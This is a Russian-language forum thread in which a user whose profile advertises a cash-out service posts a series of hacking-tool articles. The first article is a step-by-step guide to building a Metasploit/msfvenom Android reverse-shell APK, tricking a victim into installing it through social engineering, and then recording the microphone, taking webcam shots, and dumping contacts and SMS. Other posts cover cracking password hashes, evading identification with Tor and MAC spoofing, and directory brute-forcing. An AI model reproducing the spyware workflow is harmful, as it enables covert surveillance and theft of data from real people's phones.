DOBERMANN
Гай Ричи
MrLoot
Frank Vinci
atmservice
probiv

Статья NEW Авторские статьи / схемы заработка от BlackMast

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Взлом Android с помощью Metasploit и Msfvenom


Вы, наверное, ни раз слышали о самом известном хакерском инструменте под названием Metasploit. Все профессиональные хакеры в один голос скажут, что Metasploit — универсальный инструмент, который имеет множество модулей для взлома Android, IOS, а также Windows. А его работа с Msfvenom считается лучшей комбинацией для взлома устройств Android, что мы сегодня и проверим.

Metaspoilt и Msfvenom

Так почему же все так любят Metasploit? Metasploit, созданный Rapid7, имеет самую большую базу эксплойтов, шеллкодов и много разнообразной документации. А самое приятное, что все это абсолютно бесплатно. В народе его даже успели прозвать “хакерским швейцарским ножом”.
Msfvenom — бесплатный инструмент для создания полезной нагрузки (вредоносного файла). Это, так сказать, «брат» Metasploit. Стоит отметить, что теперь этот инструмент есть и в Kali Linux как отдельная опция, позволяющая максимально упростить работу.
Когда дело доходит до взлома телефонов Android, существует множество способов сделать это. Есть приложения, сайты, скрипты и многое другое. Мы уже ни раз демонстрировали вам различные методы взломов, ну а сегодня мы расскажем, как взломать телефон Android с помощью Metasploit и Msfvenom.
Как взломать Android
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Для выполнения этого взлома с использованием Metasploit и Msfvenom вам понадобится ОС Kali Linux.
Итак, приступим к взлому.
Шаг 1. Создание вредоносного APK-файла
Откройте терминал Kali Linux и введите следующую команду:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hacking.apk*LHOST= Ваш IP-адрес
*LPORT= 4444

*Используйте ifconfig, чтобы найти свой IP-адрес, если вы его не знаете.
# ifconfig
Шаг 2. Отправка APK-файла жертве

Вы создали вредоносный .apk-файл шпионского приложения с помощью Metasploit и Msfvenom. По умолчанию он будет сохранен в вашей папке /home/. Найдите свой недавно созданный файл hacking.apk и отправьте его жертве. Используйте навыки социальной инженерии, чтобы заставить жертву установить файл.
*Если у вас возникли какие-либо ошибки или проблемы с подписью, используйте следующее:
Keytool(предустановлен в Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsigner (предустановлен в Kali Linux)
Затем введите:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hacking.apk aliasname
После этого:
jarsigner -verify -verbose -certs hacking.apk
Шаг 3. Настройка Metasploit
Откройте новый терминал и используйте следующую команду, чтобы запустить платформу Metasploit.


# msfconsole
Теперь в консоли платформы Metasploit введите следующее:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp

после этого настройте адрес прослушивающего хоста:
set LHOST 192.168.78.129
set LPORT 4444

exploit

*LHOST= Ваш IP-адрес
*LPORT= 4444
Шаг 4. Эксплуатация
Теперь, когда жертва откроет приложение на своем телефоне, вы получите полный доступ к устройству.
Вот некоторые команды, которые вы можете использовать:
  • record_mic — записывает звук с устройства Android и сохраняет его на локальном диске.
  • webcam_snap — позволяет делать снимки, взломав камеру Android устройства.
  • webcam_stream — транслирует онлайн видео со взломанной камеры Android.
  • dump_contacts — копирует все контакты с телефона жертвы.
  • dump_sms — взламывает сообщения жертвы и сохраняет их в текстовом файле в вашей системе.
  • geolocate — отслеживает взломанное устройство по местоположению.
Заключение

Хотя Metasploit и Msfvenom не так сложны в использовании, они требуют последовательных шагов, которые необходимо реализовать. Но благодаря нашему руководству любой начинающий хакер с лёгкостью осилит эти инструменты. Надеемся, что эта статья была для вас информативной и полезной. Удачи!
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
HTTrack: Руководство по парсингу сайта




Вступить в наш чат
В интернете часто необходимо собрать большой объем информации с сайта, после чего её проанализировать и применить для каких-либо целей. Однако, делать это вручную — очень трудоемкий и энергоресурсный процесс. Откройте для себя HTTrack, автоматизированный инструмент для парсинга сайтов с открытым исходным кодом, который может собирать данные за считанные минуты. В этой статье мы рассмотрим инструмент HTTrack в мельчайших деталях, а также предоставим пошаговую инструкцию к использованию.


Что такое парсинг сайта
Парсинг – это автоматизированный сбор информации с любого сайта, ее анализ, преобразование и выдача в структурированном виде, чаще всего в виде таблицы с набором данных.

Парсер сайта — это любая программа или сервис, которая осуществляет автоматический сбор информации с заданного ресурса.

Законно ли парсить чужие сайты
Парсинг данных с сайтов не противоречит закону, если:

получаемая информация находится в открытом доступе и не несет коммерческую тайну;
не затрагиваются авторские права полученной информации;
парсинг проводится законным методом;
парсинг не влияет на нормальную работу сайта (не приводит к сбоям).

Что такое HTTrack и его возможности
HTTrack — бесплатный инструмент с открытым исходным кодом, разработанный Xavier Roche. Он может копировать целые сайты, включая файлы HTML, изображения, CSS, JavaScript и многое другое. Основная функция HTTrack — создание локального зеркала сайта, позволяющего просматривать его в автономном режиме.

HTTrack может фильтровать контент, позволяя загружать только определенные файлы, такие как изображения, видео или документы.
Важно отметить, что HTTrack сохраняет исходную структуру папок зеркального сайта. С их помощью вы сможете легко ориентироваться.
HTTrack может приостанавливать и возобновлять загрузку без потери прогресса.
Кроме того, вы можете легко обновлять свою локальную копию с помощью функции «Обновление». Инструмент добавит недостающий контент на ваш зеркальный сайт.
HTTrack отличается скоростью и эффективностью, так как использует многопоточную систему для быстрой загрузки.
HTTrack ведет подробные журналы процесса, что упрощает мониторинг и устранение любых возникающих проблем.

Как использовать HTTrack: пошаговое руководство
Давайте углубимся в практические аспекты использования HTTrack.

1. Загрузите и установите HTTrack с официального сайта HTTrack по ссылке. Скачайте версию HTTrack, соответствующую вашей операционной системе (Windows, Linux, macOS). Установите программу, следуя инструкциям на экране.

2. Запустите HTTrack. После установки запустите HTTrack.

3. Настройте свой проект. Нажмите «Далее», чтобы начать создание нового проекта. Введите имя своего проекта и выберите папку назначения, в которой будет храниться зеркальный сайт. Нажмите "Далее."


4. Установите параметры. Настройте параметры парсинга, указав начальный URL-адрес (сайт, который вы хотите парсить). Установите фильтры для всех типов файлов (например, скачать только изображения). Нажмите «Далее», чтобы продолжить.


5. Запустите парсинг. Нажмите «Готово», чтобы начать Парсинг сайта. Вы можете отслеживать ход выполнения и проверять журналы на наличие ошибок.

После завершения парсинга перейдите в папку назначения, указанную вами ранее. Откройте файл «index.html», чтобы начать изучение зеркального сайта.

Заключение
HTTrack — это универсальный инструмент для парсинга сайтов, который делает процесс простым и эффективным. Удобный интерфейс, настраиваемые функции и открытый исходный код делают его незаменимым помощником в вашем арсенале инструментов. Начните свое изучение парсинга сайтов уже сегодня с помощью HTTrack. Удачного пользования!
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Как сохранить анонимность в интернете




Вступить в наш чат​
Какие следы в интернете вы оставляете, а главное, что можно по ним узнать? Гораздо больше, чем вы думаете. Любая собранная информация может быть использована для идентификации вашей личности. Чтобы этого избежать, мы подготовили для вас два инструмента, которые помогут замести следы, обеспечив безопасность в сети.

Инструменты для анонимности в сети
Anonsurf — это инструмент для изменения IP-адреса в Kali Linux, разработанный командой Parrot Sec. Он работает в фоновом режиме, постоянно меняя ваш IP-адрес, чтобы вы оставались анонимными. Anonsurf использует два основных сервиса для обеспечения анонимности в Интернете. Один из них — Tor, а другой — iptables, служба Linux для управления IP-адресами. Он имеет открытый репозиторий на Github.

Macchanger — это встроенный инструмент Kali Linux, который может изменить ваш Mac-адрес. Он имеет множество функций для сохранения вашей анонимности.

Итак, приступим к установке и настройке Anonsurf и Macchanger в Kali Linux.

Как изменение IP и Mac-адреса делают вас анонимными
Ваш IP и MAC-адреса — это уникальные идентификаторы, по которым можно вас найти. Ваши системные данные, а также местоположение можно отслеживать с помощью ваших адресов. Таким образом, когда вы измените свой Mac и IP-адреса, вас не получится деанонимизировать.

Установка Anonsurf
Шаг 1. Откройте терминал в Kali Linux и используйте следующую команду, клонирующую репозиторий Anonsurf из Github:

git clone https://github.com/Und3rf10w/kali-anonsurf.git



Шаг 2. Измените каталог и дайте разрешения anonsurf. Вы можете сделать это с помощью следующих команд:

cd kali anonsurf
****d +x ./installer.sh
Шаг 3. Запустите сценарий anonsurf:

sudo ./installer.sh



Шаг 4. Теперь начнется установка и будут установлены зависимости.

Шаг 5. После завершения установки введите команду help, чтобы получить список всех возможных опций инструмента:

anonsurf help



Шаг 6. Теперь запустите службу Anonsurf:

anonsurf start
Поздравляем, ваш IP-адрес скрыт. Теперь изменим MAC-адрес вашей системы.


Установка Macchanger
Шаг 1. Выключите сетевую карту. Используйте следующую команду Linux, чтобы отключить сетевую карту:

ifconfig device down
Используйте команду ifconfig, чтобы найти имя вашего устройства.

Это будет либо eth0,eth1 или wlan0, wlan1 и т. д.

Шаг 2. Установите случайный MAC-адрес:

macchanger -r eth0




Как видно на изображении выше, Mac-адрес был изменен.

Чтобы проверить все команды, используйте опцию справки:

macchanger -h
Примечание: Постоянный MAC-адрес будет восстановлен после перезагрузки.



Шаг 3. Включите сетевую карту:

ifconfig eth0 up
Шаг 4. Восстановите Mac-адрес по умолчанию. Если вы хотите восстановить ваш MAC-адрес, используйте следующие команды:

macchanger –p eth0
Шаг 5. Подмена Mac-адреса.


Вы можете подделать MAC-адрес, используя следующую команду:

macchanger -m [Spoofing MAC Address] eth0
macchanger -m XX:XX:XX:XX:XX:XX eth0
Здесь XX:XX:XX:XX:XX:XX следует заменить на целевой MAC-адрес.

Если вы получили следующую ошибку:

ОШИБКА: Невозможно изменить MAC: интерфейс включен или нет разрешения: невозможно назначить запрошенный адрес.

То вам нужно отключить сетевой интерфейс, а затем изменить MAC-адрес, введя команду:

ifconfig wlan1 down
Теперь вы полностью анонимны, поскольку ваш IP и MAC адреса скрыты.​
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Dirbuster: ваш ангел-хранитель в мире кибербезопасности





Вступить в наш чат​
В бесконечном противостоянии с киберугрозами инструмент под названием Dirbuster выступает грозным оружием. В этой статье мы окунемся в мир Dirbuster, раскрыв все его секреты и потенциал для защиты вашего цифрового мира.



Скрытые угрозы
Прежде чем мы раскроем возможности Dirbuster, давайте признаем зловещую реальность цифрового мира. Каждый день хакеры и злоумышленники рыскают в поисках уязвимостей, подобно призрачным хищникам, которые скрываются в темных уголках киберпространства, затаившись в ожидании идеального момента для удара.

Каждый пользователь обязан сохранять бдительность, чтобы не стать жертвовать злоумышленников. Одним из фундаментальных принципов кибербезопасности является обеспечение защиты ваших данных от взломов. Именно здесь в игру вступает Dirbuster.

Dirbuster: на страже вашего сайта
Этот мощный инструмент предназначен для проведения разведки сайтов, помогая обнаружить скрытые каталоги и файлы. Интрумент неустанно сканирует ваш веб-сервер, выявляя потенциальные уязвимости до того, как злоумышленники смогут ими воспользоваться.

Dirbuster работает по простому, но эффективному принципу – перебор каталогов и файлов. Он отправляет на целевой веб-сервер шквал запросов, пробуя разные имена каталогов и файлов. Когда он находит совпадение, он предупреждает вас о наличии уязвимостей.

Принцип работы Dirbuster
Начать работу с Dirbuster очень просто. Во-первых, он имеет открытый исходный код, а во-вторых, совместим с различными платформами. Следовательно, вы можете быстро загрузить его и начать сканирование своего сайта в течение нескольких минут.

Одной из сильных сторон Dirbuster является его универсальность. Он позволяет вам настраивать списки слов и расширения, которые вы хотите использовать во время сканирования. Это означает, что вы можете адаптировать сканирование Dirbuster к вашим конкретным потребностям.

Установка Dirbuster
Давайте перейдём к процессу установки. Dirbuster — это инструмент на основе Java, поэтому вам необходимо иметь в вашей системе Java (JRE).

Шаг 1. Установите Java

Если у вас не установлена Java, вы можете загрузить ее с официального сайта Oracle или использовать OpenJDK, популярную альтернативу с открытым исходным кодом.

Шаг 2. Загрузите Dirbuster

Вы можете загрузить инструмент с официального сайта. Убедитесь, что вы скачиваете последнюю версию, обычно предоставляемую в виде файла JAR (архив Java).

Шаг 3. Запустите Dirbuster

После загрузки JAR-файла Dirbuster вы можете запустить его с помощью следующей команды в своем терминале:

java -jar DirBuster-0.12.jar
Замените DirBuster-0.12.jar настоящим именем загруженного вами JAR-файла Dirbuster.

Использование Dirbuster: пошаговое руководство
Теперь, когда у вас есть этот инструмент, давайте посмотрим, как вы можете его использовать.




Шаг 1. Укажите целевой URL-адрес

Чтобы начать сканирование, вам необходимо указать целевой URL-адрес. После -u напишите URL-адрес:

java -jar DirBuster-0.12.jar -u http://пример.com
Шаг 2. Выберите список слов

Выберите список слов для сканирования, используя -l, за которым следует путь к файлу списка слов. Dirbuster предоставляет список слов по умолчанию, но вы также можете создавать собственные словари для настройки сканирования:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt
Шаг 3. Запустите сканирование

Чтобы начать сканирование, добавьте -r. Это говорит о том, что инструмент будет исследовать каталоги и файлы:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r





Дополнительные команды
Dirbuster предлагает несколько дополнительных команд для улучшения сканирования:

1. Сканирование методом перебора: добавьте -b для сканирования методом перебора:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r -b
2. Выбор протокола: чтобы указать протокол, отличный от HTTP, используйте -p:

java -jar DirBuster-0.12.jar -u ftp://пример.com -l /path/to/словарь.txt -r






3. Сортировка расширений: для сортировки по расширениям используйте -x:

java -jar DirBuster-0.12.jar -u http://пример.com -l /path/to/словарь.txt -r -x php,html
Заключение
Dirbuster помогает выявлять и устранять уязвимости до того, как злоумышленники смогут ими воспользоваться. Заблаговременно обнаруживая скрытые каталоги и файлы, он укрепляет защиту вашей цифровой крепости и позволяет оставаться на шаг впереди потенциальных угроз. Не ждите, пока станет слишком поздно. Загрузите Dirbuster уже сейчас, чтобы начать сканирование своего сайта.
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Извлекаем хэши паролей с помощью John The Ripper




Вступить в наш чат​
Большинство начинающих пентестеров не понимают, как извлекать хэши паролей. И поэтому сегодня мы расскажем, как это сделать с помощью инструмента John The Ripper.

В прошлой статье мы говорили о том, что такое хэширование. Если вы еще не читали её, то советуем начать именно с неё. А теперь давайте коротко вспомним, что означает этот термин.

Хэширование – это процесс преобразования данных (в нашем случае паролей) в зашифрованную строку для обеспечения безопасности. Хэш - это набор случайных символов, который генерируется на основе текстового пароля с помощью специального алгоритма хэширования, что позволяет защитить пароль от взлома и улучшить его безопасность. Даже если злоумышленник получит доступ к базе данных паролей, он не сможет прочитать их в открытом виде и использовать для входа в систему. Так как же все-таки расшифровать полученные хэши? Что ж, у Джонни есть ответ, который вам нужен.

Установка
Представляем Johnny — кроссплатформенный графический интерфейс с открытым исходным кодом для популярного взломщика паролей John the Ripper, который доступен в Kali Linux. Но вы также можете установить его и в Windows, для этого просто скачайте программу установки с официального сайта.

Цель Джонни — автоматизировать и упростить взлом паролей с помощью универсального инструмента John the Ripper, а также добавить к нему дополнительные функции, в том числе и удобный графический интерфейс, а еще множество атак и улучшенный рабочий процесс хэширования.

Далее вам понадобится установочный файл John the Ripper, который вы можете скачать здесь. Теперь откройте и установите Джонни, как и любое другое приложение. Как только вы закончите с этим, вам нужно настроить инструмент. Для этого распакуйте John the Ripper в папку.

Используйте настройки, чтобы соединить Джона Потрошителя и Джонни вместе.



Теперь, когда оба инструмента подключены друг к другу, мы можем приступить к взлому хэшей паролей.

В этом демонстрационном руководстве мы будем использовать список DEFCON, содержащий хэшированные пароли, которые нам нужно взломать. Он имеет более 50 000 паролей учетных записей, которые мы взломаем менее чем за 2 часа.

Итак, поехали!

Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Шаг 1. Импортируем хэши

Запустите Johnny и импортируйте хэши с помощью опции для открытия файла паролей.

Шаг 2. Ищем список слов

Загрузите хороший словарь из Интернета. Мы будем использовать список слов из двух миллиардов возможных паролей, который вы можете скачать отсюда.

Шаг 3. Выбираем список слов

Перейдите в раздел «Wordlist» и выберите загруженный список слов.

Шаг 4. Выбираем типа хэша

Теперь по умолчанию для взлома будет автоматически выбран наиболее часто используемый тип хэша - sha1, но вы также можете настроить тип вручную. После нажмите «Начать атаку», и должен начаться взлом пароля.



Шаг 5. Меняем тип хэша

После того, как вы взломали все возможные хэши одного типа, нужно ввести другой тип хеша и снова продолжить взлом.

Наберитесь терпения. В нашем случае на взлом 50.000 паролей ушло 2 часа. Но если у вас более мощный компьютер, то получится и быстрее.

Так как же все это работает?

Что ж, происходит следующее: Джонни автоматизировал процесс взлома паролей и, используя наш список слов, начал сравнивать хэши паролей с хэшами, присутствующими в списке задач. Стоит отметить, что пароли были далеко не из простых, но тем не менее, мы их смогли легко взломать. Иначе говоря, если у вас есть надежный список слов, то вы можете взломать практически любой пароль.

Как защитить свой пароль от взлома
Остерегайтесь фишинговых атак;
Используйте двухфакторную аутентификацию для всего, чем вы только пользуетесь;
Создайте пароль длиной не менее 12 символов. Чем больше пароль, тем сложнее его взломать;
Проверьте, не была ли когда-либо скомпрометирована ваша электронная почта. Для этого зайдите на этот сайт.
Будьте бдительны и совершенствуйте свои знания, читая наши статьи.
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
EDR — обнаружение и реагирование на угрозы конечных точек



Вступить в наш чат
Каждый день пользователи сталкиваются с различными киберугрозами, поскольку злоумышленники находят новые способы атак. Это требует надежных мер безопасности, и одним из главных решений является обнаружение и реагирование на угрозы конечных точек (EDR). EDR служит важнейшим щитом против угроз, отслеживая и быстро реагируя на потенциальные опасности, скрывающиеся в конечных точках.





Что такое конечные точки
Конечные точки — это физическое оборудование, которое подключается к сетевой системе. Это могут быть мобильные устройства, настольные компьютеры, виртуальные машины, встроенная аппаратура или серверы. Средства обеспечения безопасности конечных точек помогают защитить их от злоумышленников и уязвимостей.

Киберпреступники выбирают конечные точки для атак, поскольку они позволяют получить доступ к личным данным. Они находятся за пределами сетевого периметра безопасности, и за их защиту отвечают пользователи, которые часто допускают ошибки. Защита конечных точек от атак имеет первостепенное значение, и за нее отвечает EDR.

Что такое EDR
EDR или Endpoint Detection and Response (в переводе с англ. обнаружение и реагирование на угрозы конечных точек) — важнейшее решение в области кибербезопасности, предлагает непрерывный мониторинг и защиту от различных угроз, нацеленных на конечные точки. Эти угрозы охватывают широкий спектр: от вредоносного программного обеспечения и программ-вымогателей до фишинга и сложных эксплойтов нулевого дня.

EDR анализирует данные, собранные с различных устройств, таких как компьютеры, ноутбуки, серверы и мобильные устройства, быстро выявляя любые подозрительные действия и реагируя на них.

Основные функции EDR
По своей сути EDR выполняет три важные функции:

Сбор данных: EDR постоянно собирает данные с конечных точек, анализируя информацию об активности файлов, сетевых подключениях и т.д.. Эти данные составляют основу возможностей EDR по обнаружению и реагированию.
Обнаружение угроз: EDR использует передовые методы, включая машинное обучение, поведенческий анализ и анализ угроз для выявления закономерностей, указывающих на потенциальные угрозы. Сюда входит обнаружение известных вредоносных программ, программ-вымогателей, фишинга и эксплойтов нулевого дня.
Автоматизированный ответ: при обнаружении угрозы EDR может предпринять автоматические действия для устранения угрозы. Эти действия могут включать изоляцию зараженной конечной точки, помещение вредоносных файлов в карантин или даже полное удаление угрозы.
Механизмы обнаружения EDR
EDR использует различные механизмы для выявления и классификации потенциальных угроз:

Обнаружение на основе подписей. Этот традиционный метод сравнивает подписи файлов с базой данных известных вредоносных программ. Если файл соответствует известной подписи, он помечается как вредоносный.
Эвристический анализ. Этот метод проверяет поведение и характеристики файла для выявления подозрительных закономерностей, которые могут указывать на вредоносное ПО, даже если сам файл неизвестен.
Поведенческий анализ. Благодаря поведенческому анализу EDR активно отслеживает запущенные процессы и приложения, быстро обнаруживая аномалии, которые могут сигнализировать о вредоносных действиях. Этот метод способствует превентивному выявлению потенциальных угроз.
Машинное обучение. Используя алгоритмы машинного обучения, EDR эффективно анализирует обширные наборы данных, быстро выявляя сложные закономерности, указывающие на потенциальные угрозы. Такой подход значительно расширяет возможности обнаружения угроз.
Анализ угроз. Благодаря интеграции с потоками данных об угрозах EDR всегда находится в курсе новейших ландшафтов угроз, уязвимостей и развивающихся методов атак. Эта интеграция позволяет системе активно предвидеть и противодействовать возникающим угрозам.
Лучшие инструменты EDR
Вот некоторые из передовых инструментов EDR на рынке:

Palo Alto Networks Cortex XDR
Palo Alto Networks Cortex XDR предлагает комплексное решение EDR, обеспечивающее не только видимость конечных точек, но и надежное обнаружение угроз и возможности быстрого реагирования на атаки. Cortex XDR, известный своими расширенными функциями машинного обучения, легко интегрируется с различными устройствами, повышая их общую безопасность.

SentinelOne Singularity
Singularity — это облачное решение EDR, известное своей простотой использования и способностью масштабироваться до крупных предприятий. Он предлагает множество функций, включая обнаружение конечных точек, поиск угроз и автоматическое ликвидирование.

CrowdStrike Falcon Insight XDR
Falcon Insight XDR — еще одно облачное решение EDR, известное своими мощными возможностями обнаружения и использованием машинного обучения для выявления угроз. Falcon XDR решает самые серьезные проблемы обнаружения и реагирования на инциденты, обеспечивая: видимость, поиск и реагирование с неслыханной скоростью и масштабом.

Cynet 360 AutoXDR
Cynet 360 AutoXDR - это усовершенствованная платформа для обнаружения и реагирования на угрозы, которая точно обнаруживает сложные кибератаки, такие как Advanced Persistent Threats (APT), продвинутые вредоносные программы, трояны, вымогатели и атаки "нулевого дня".

Trend Micro XDR
XDR — это облачное решение EDR, которое собирает и коррелирует данные, охватывая несколько уровней безопасности — электронную почту, конечные устройства, серверы, сети и облачные нагрузки. Такой анализ данных позволяет быстрее обнаруживать угрозы и сокращать время расследования и реагирования.

Выбор лучшего инструмента для вас будет зависеть от ваших конкретных потребностей и требований.

Заключение
Перед лицом быстро меняющихся угроз EDR выступает в качестве важного инструмента для пользователей и организаций, стремящихся защитить свои данные и системы. Использование EDR имеет решающее преимущество в борьбе с киберугрозами.
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Топ 7 хакерских расширений для вашего браузера





Вступить в наш чат
В интернете, где на каждом шагу скрываются угрозы, важно уметь защищать свое личное киберпространство. Расширения браузера предлагают уникальный уровень защиты как для хакеров, так и для обычных пользователей, которые беспокоятся о безопасности своих данных. Эти расширения имеют множество функций: от выявления уязвимостей до защиты паролей. И сегодня мы поделимся с вами 7 лучшими расширениями браузера, о которых должен знать каждый.



1. Foxyproxy Standard



Представьте себе сёрфинг в Интернете без ограничений, легкий обход геоблокировок и доступ к контенту со всего мира. С Foxyproxy Standard это становится реальностью. Расширение позволяет легко переключать IP-адреса, а обширная сеть прокси-серверов гарантирует, что у вас всегда будет надежное соединение под рукой с повышенной безопасностью во время просмотра.

2. Multi-Account Containers


Multi-Account Containers - это расширение, разрабатанное Mozilla и позволяющее разделить просмотр между различными помеченными цветом вкладками для защиты вашей конфиденциальности. Используя эти контейнеры, вы можете категоризировать просмотр на основе целей и создавать вкладки для Работы, Банкинга, Покупок и Личного. Контейнер с несколькими учетными записями выступает в роли вашего личного органайзера, изолируя каждую учетную запись в отдельные категории, чтобы файлы cookie и учетные данные для входа не мешали друг другу. Это расширение не только упрощает управление учетной записью, но и защищает вашу конфиденциальность, предотвращая межсайтовое отслеживание и несанкционированный доступ.

3. Pwnfox


Для тех, кто хочет попробовать себя в роли хакера или эксперта по безопасности, выявляя уязвимости, Pwnfox станет бесценным помощником. Это расширение легко интегрируется с веб-браузерами, сканируя сайты на наличие пробелов в безопасности, а затем предоставляет подробную инструкцию о том, как их можно использовать.

4. HackBar V2 (Firefox) and HackBar (Chrome)



Представьте себе, что у вас под рукой есть набор команд, инструментов и фрагментов кода, готовых упростить ваши задачи по взлому. С HackBar это становится возможным. Он автоматизирует повторяющиеся задачи, упрощает сложные операции и повышает общую производительность.

5. Hack-Tools


Hack-Tools — это сокровищница для хакеров и специалистов по кибербезопасности, предлагающая полный набор инструментов, адаптированных к различным аспектам хакинга. От полезных нагрузок XSS до инструментов кодирования данных и генератора хэшей. Hack-Tools имеет универсальный магазин для широкого спектра потребностей в области кибербезопасности, который станет незаменимым помощником в вашем наборе инструментов.

6. Shodan



Раскрыть тайный мир интернет устройств теперь стало возможным благодаря Shodan, известной поисковой системе, специально разработанной для этой цели. Это расширение легко интегрирует возможности Shodan в ваш веб-браузер, позволяя вам искать и анализировать устройства на основе их IР адресов, портов и другой соответствующей информации. Shodan — бесценный инструмент для исследователей безопасности и хакеров.

7. uBlock Origin




В интернете на сегодняшний день навязчивая реклама, всплывающие окна и вредоносные скрипты стали нежелательной нормой. Они тормозят вашу работу и ставят под угрозу вашу конфиденциальность. uBlock Origin поможет вам в этом деле, заблокируя все возможные помехи на ваших веб-страницах благодаря обширным фильтрам и настройкам.

Заключение
Сфера кибербезопасности постоянно развивается, поэтому необходимо вооружиться надежными инструментами, чтобы противостоять угрозам и защищать свои данные. Сегодня мы рассказали вам о 7 расширениях браузера, тщательно отобрав самые лучшие с учетом их функциональности и значимости. Но на этом наша подборка не заканчивается, в следующей части мы поговорим о других расширениях для улучшения ваших навыков, оптимизации рабочего процесса и повышения общей эффективности в цифровом мире. Надеемся, эти расширения помогут вам в работе, защитив ваше цифровое пространство.
 

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Анонимность браузера с помощью Privacy Possum



Вступить в наш чат
Отслеживание пользователей в Интернете уже давно в порядке вещей. И прямо сейчас за вашими действиями могут наблюдать. Однако, не все так плачевно, если знать, как «уйти в тень». Сегодня мы вам расскажем, как защититься от слежки с помощью расширения Privacy Possum.




Конечно, ничто не мешает вам загрузить Tor Browser, который, к слову, и сам основан на Firefox. Но если вы уже привыкли к Firefox, то на помощь придет созданное независимыми разработчиками расширение. С его помощью можно блокировать трекинг со стороны интернет-ресурсов, менять данные геолокации, модифицировать «отпечаток» браузера, а также делать множество других крутых и полезных вещей.

Защита от отслеживания с Privacy Possum
Privacy Possum
— расширение с открытым исходным кодом для браузеров Chrome и Firefox. Privacy Possum предотвращает прием файлов cookies, блокирует HTTP-заголовки set-cookie и referrer, а также искажает «отпечаток» браузера, что затрудняет фингерпринтинг.





Как и большинство расширений для конфиденциальности, он добавляет значок на главную панель инструментов, которая действует как индикатор активности блокировки. Продвинутых настроек у плагина нет: его можно включить или выключить, а на страничке конфигурации — запретить автоматическое обновление и разрешить ему запускаться в приватном окне.



Текущая версия расширения блокирует четыре разных способа слежки:
  • Блокировка заголовков референта, которые могут отображать местоположение просмотра;
  • Блокировка заголовков etag для отслеживания кеширования браузера. Privacy Possum strip и хранит данные заголовка etag и сравнивает его с сторонними запросами к URL-адресу, чтобы определить, используется ли заголовок для отслеживания или нет;
  • Блокировка всех сторонних файлов cookie, которые используются для отслеживания пользователей;
  • Блокировка некоторых браузеров. Если сайт смешивает код фингерпринтинга первой стороны с кодом, необходимым для запуска сайта, Privacy Possum не будет блокировать, а будет разбавлять данные, введя случайные данные, чтобы изменить фингерпринт.
Privacy Possum запускается автоматически. Расширение указывает на активность блокировки, добавляя номер к его значку. Появится щелчок по значку.

Интерфейс имеет переключатель включения-выключения, который можно использовать для деактивации расширения. Privacy Possum поддерживает функцию белого списка. В нем перечислены заблокированные элементы, например, заголовки отслеживания или файлы JavaScript, которые загружаются в интерфейс; просто нажмите на флажок перед заблокированным элементом, чтобы отключить блокировку для этого конкретного сайта.

Скачать Privacy Possum
Скачать расширение можно с маркетов Firefox, Google и с официальной страницы на Гитхаб.

Заключение
Privacy Possum — многообещающее расширение браузера для Chrome и Firefox, которое улучшает вашу конфиденциальность в Интернете. Оно предлагает много защитных функций, и, безусловно, поможет сохранить вашу анонимность.
 
Последнее редактирование:

BlackMAST

Обнал сервис
Продавец

BlackMAST

Обнал сервис
Продавец
Статус
Offline
Регистрация
22 Ноя 2019
Сообщения
268
Реакции
14
Покупки через Гарант
0
Продажи через Гарант
0
Volatility. Анализ вредоносного ПО



Вступить в наш чат
В этой статье мы поговорим об инструменте Volatility и о том, как проводить анализ вредоносного ПО, используя этот инструмент. Мы обсудим различные возможности инструмента и его команды.


Что такое анализ вредоносных программ?
Анализ вредоносных программ
— это процесс, который исследует функционирование, цели и потенциальное воздействие вредоносного программного обеспечения (вредоносных программ). Этот тип анализа имеет первостепенное значение в мире кибербезопасности, поскольку вредоносное ПО становится все более сложным и всепроникающим.

Анализ файлов можно разделить на два вида:

  1. Статический, при котором файл исследуется без его исполнения;
  2. Динамический, когда инициируется запуск файла в безопасной среде (тестовая железка или виртуальная машина).
Стоит отметить, что соблюдения перечисленных правил полностью не обезопасят вас от заражения компьютера или потери данных, связанных с неосторожной работой с вредоносными файлами. Но значительно повысят надёжность вашего рабочего окружения.

Итак, что нас подстерегает при анализе вредоносного ПО:

  1. Случайный запуск исполняемого файла.
  2. Эксплуатация уязвимости в анализируемом ПО.
